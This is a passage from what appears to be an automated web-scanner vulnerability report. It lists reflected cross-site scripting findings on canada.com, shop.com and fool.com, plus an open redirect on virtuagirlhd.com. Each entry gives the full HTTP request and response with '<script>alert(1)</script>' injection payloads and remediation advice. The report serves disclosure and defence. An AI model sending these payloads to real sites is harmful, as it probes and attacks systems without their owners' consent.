Set-Cookie: Tookie=T=13570208180172800356626237603535; domain=.fool.com; expires=Sat, 17-Apr-2021 04:00:00 GMT; path=/
X-Powered-By: ASP.NET
Set-Cookie: v1st=9A9BF69D984C98F6; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.fool.com
Date: Thu, 21 Apr 2011 02:28:41 GMT
Content-Length: 2415

<HTML>
<HEAD>
<title>Server Error</title>
</HEAD>
<BODY bgcolor="#ffffff" link="#003399" vlink="#006633" alink="#cc3300" topmargin="5" marginheight="5" marginwidth="5" leftmargin="5">
<table
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=e4795"><script>alert(1)</script>19e101a4cb2">
...[SNIP]...

3.57. http://www.canada.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.canada.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9315'%3bcbb31b54b04 was submitted in the REST URL parameter 1. This input was echoed as e9315';cbb31b54b04 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /e9315'%3bcbb31b54b04 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.canada.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response (redirected)

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www2.canada.com/e9315';cbb31b54b04/index.html
Content-Type: text/html; charset=utf-8
Expires: Thu, 21 Apr 2011 02:18:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 21 Apr 2011 02:18:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 3578

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www2.canada.com/e9315';cbb31b54b04/index.html">here</a>.</h2>
</body></html>
<form name="frmPage" method="po
...[SNIP]...
-
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.pageName='/canada/www.canada.com/e9315';cbb31b54b04/index.html';
s.server=window.location.hostname.toLowerCase();
s.channel='Canada';
s.pageType='';
s.p
...[SNIP]...

3.58. http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shop.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 627b2"><script>alert(1)</script>875028743e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?627b2"><script>alert(1)</script>875028743e=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shop.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 URL Redirect
Server: AMOS/1.0
Date: Thu, 21 Apr 2011 02:20:52 GMT
Content-Type: text/html
Content-Length: 349
Location: http://edge.shop.com/ccimg.shop.com/web/favicon.ico?627b2"><script>alert(1)</script>875028743e=1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache

<html><head><title>Document Moved</title>
<META URL=http://edge.shop.com/ccimg.shop.com/web/favicon.ico?627b2"><script>alert(1)</script>875028743e=1">
</head>
<body><h1>Object Moved</h1>This docume
...[SNIP]...
<a href="http://edge.shop.com/ccimg.shop.com/web/favicon.ico?627b2"><script>alert(1)</script>875028743e=1">
...[SNIP]...

3.59. http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter] previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shop.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 4d9ff><script>alert(1)</script>ea51dbc2d04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?4d9ff><script>alert(1)</script>ea51dbc2d04=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shop.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 URL Redirect
Server: AMOS/1.0
Date: Thu, 21 Apr 2011 02:20:52 GMT
Content-Type: text/html
Content-Length: 349
Location: http://edge.shop.com/ccimg.shop.com/web/favicon.ico?4d9ff><script>alert(1)</script>ea51dbc2d04=1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache

<html><head><title>Document Moved</title>
<META URL=http://edge.shop.com/ccimg.shop.com/web/favicon.ico?4d9ff><script>alert(1)</script>ea51dbc2d04=1">
</head>
<body><h1>Object Moved</h1>This docume
...[SNIP]...

4. Open redirection previous

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.virtuagirlhd.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .a32cf6eb1b7e094e5/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

http://www.virtuagirl.com?.a32cf6eb1b7e094e5/=1

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Remediation detail

When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targetting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Remediation background

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:

Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs.
Maintain a server-side list of all URLs that are permitted for redirection. Instead of passing the target URL as a parameter to the redirector, pass an index into this list.

If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

The application should use relative URLs in all of its redirects, and the redirection function should strictly validate that the URL received is a relative URL.
The application should use URLs relative to the web root for all of its redirects, and the redirection function should validate that the URL received starts with a slash character. It should then prepend http://yourdomainname.com to the URL before issuing the redirect.
The application should use absolute URLs for all of its redirects, and the redirection function should verify that the user-supplied URL begins with http://yourdomainname.com/ before issuing the redirect.

Request

GET /favicon.ico?.a32cf6eb1b7e094e5/=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.virtuagirlhd.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 302 Moved Temporarily
Date: Thu, 21 Apr 2011 02:29:57 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.8
Location: http://www.virtuagirl.com?.a32cf6eb1b7e094e5/=1
Content-Length: 231
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from www1.virtuagirl.com
X-Cache-Lookup: MISS from www1.virtuagirl.com:80
Via: 1.0 www1.virtuagirl.com:80 (squid/2.6.STABLE21)
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.virtuagirl.com?.a32cf6eb1b7e094e5/=1
...[SNIP]...

Report generated by XSS.CX at Thu Apr 21 14:17:31 CDT 2011.